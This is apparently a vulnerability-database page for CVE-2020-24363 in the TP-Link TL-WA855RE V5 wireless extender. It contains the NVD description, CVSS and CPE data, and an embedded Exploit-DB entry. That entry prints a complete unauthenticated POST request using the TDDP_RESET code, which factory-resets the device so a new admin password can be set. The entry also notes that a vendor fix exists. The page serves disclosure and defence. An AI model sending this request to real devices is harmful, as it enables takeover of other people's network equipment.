Search...

CVE-2020-24363

2020-08-31T16:15:00

ID CVE-2020-24363
Type cve
Reporter cve@mitre.org
Modified 2020-09-08T17:41:00

Description

TP-Link TL-WA855RE V5 20200415-rel37464 devices allow an unauthenticated attacker (on the same network) to submit a TDDP_RESET POST request for a factory reset and reboot. The attacker can then obtain incorrect access control by setting a new administrative password.

JSON Vulners Source

Initial Source

{"id": "CVE-2020-24363", "bulletinFamily": "NVD", "title": "CVE-2020-24363", "description": "TP-Link TL-WA855RE V5 20200415-rel37464 devices allow an unauthenticated attacker (on the same network) to submit a TDDP_RESET POST request for a factory reset and reboot. The attacker can then obtain incorrect access control by setting a new administrative password.", "published": "2020-08-31T16:15:00", "modified": "2020-09-08T17:41:00", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-24363", "reporter": "cve@mitre.org", "references": ["https://pastebin.com/VjHM4UiA", "https://www.tp-link.com/us/support/download/tl-wa855re/#Firmware", "http://malwrforensics.com/en/2020/08/31/cve-2020-24363-tl-wa855re-v5-advisory/"], "cvelist": ["CVE-2020-24363"], "type": "cve", "lastseen": "2020-10-03T12:55:53", "edition": 4, "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49092"]}], "modified": "2020-10-03T12:55:53", "rev": 2}, "score": {"value": 4.3, "vector": "NONE", "modified": "2020-10-03T12:55:53", "rev": 2}, "vulnersScore": 4.3}, "cpe": ["cpe:/o:tp-link:tl-wa855re_firmware:20200415"], "affectedSoftware": [{"cpeName": "tp-link:tl-wa855re_firmware", "name": "tp-link tl-wa855re firmware", "operator": "eq", "version": "20200415"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 8.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 6.5, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:tp-link:tl-wa855re_firmware:20200415:*:*:*:*:*:*:*"], "cwe": ["CWE-306"], "scheme": null, "affectedConfiguration": [{"cpeName": "tp-link:tl-wa855re", "name": "tp-link tl-wa855re", "operator": "eq", "version": "v5"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:h:tp-link:tl-wa855re:v5:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:tp-link:tl-wa855re_firmware:20200415:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}], "operator": "AND"}]}}

{"exploitdb": [{"lastseen": "2020-11-23T12:24:22", "description": "", "published": "2020-11-23T00:00:00", "type": "exploitdb", "title": "TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-24363"], "modified": "2020-11-23T00:00:00", "id": "EDB-ID:49092", "href": "https://www.exploit-db.com/exploits/49092", "sourceData": "# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass\r\n# Date: 2020/07/29\r\n# Exploit Author: malwrforensics\r\n# Vendor Homepage: https://tp-link.com\r\n# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip\r\n# Version: TL-WA855RE(US)_V5_200415\r\n# Tested on: N/A\r\n# CVE : 2020-24363 \r\nImportant: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware\r\n\r\nDetails\r\nBy default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.\r\nTo test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.\r\n\r\nPOST /?code=5&asyn=0 HTTP/1.1\r\nHost: <redacted>\r\nContent-Length: 7\r\nAccept: text/plain, */*; q=0.01\r\nX-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0\r\nContent-Type: text/plain;charset=UTF-8\r\nOrigin: http://<redacted>\r\nReferer: http://<redacted>\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n0|1,0,0", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/49092"}]}